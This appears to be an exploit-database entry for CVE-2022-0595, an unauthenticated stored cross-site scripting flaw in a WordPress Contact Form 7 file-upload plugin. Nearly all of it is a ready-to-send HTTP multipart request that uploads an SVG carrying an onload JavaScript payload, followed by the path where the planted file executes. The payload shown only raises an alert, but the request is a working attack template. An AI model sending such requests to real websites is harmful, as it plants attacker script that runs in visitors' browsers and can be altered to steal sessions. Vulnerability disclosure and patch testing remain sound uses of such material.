Exploit for Drag and Drop Multiple File Upload - Contact Form 7 < 1.3.6.3 - Unauthenticated Stored XSS CVE-2022-0595

Name: Exploit for Drag and Drop Multiple File Upload - Contact Form 7 < 1.3.6.3 - Unauthenticated Stored XSS CVE-2022-0595
Rating: 5 (253 reviews)

2022-03-07 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:1B849957-EACA-47EA-8F84-23A3A98CC8DE
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161
Content-Length: 655
Connection: close

-----------------------------92633278134516118923780781161
Content-Disposition: form-data; name="size_limit"

10485760
-----------------------------92633278134516118923780781161
Content-Disposition: form-data; name="action"

dnd_codedropz_upload
-----------------------------92633278134516118923780781161
Content-Disposition: form-data; name="type"

click
-----------------------------92633278134516118923780781161
Content-Disposition: form-data; name="upload-file"; filename="xss.svg"
Content-Type: image/jpeg

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(/XSS/)"/>
-----------------------------92633278134516118923780781161--


Then open https://example.com/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/xss.svg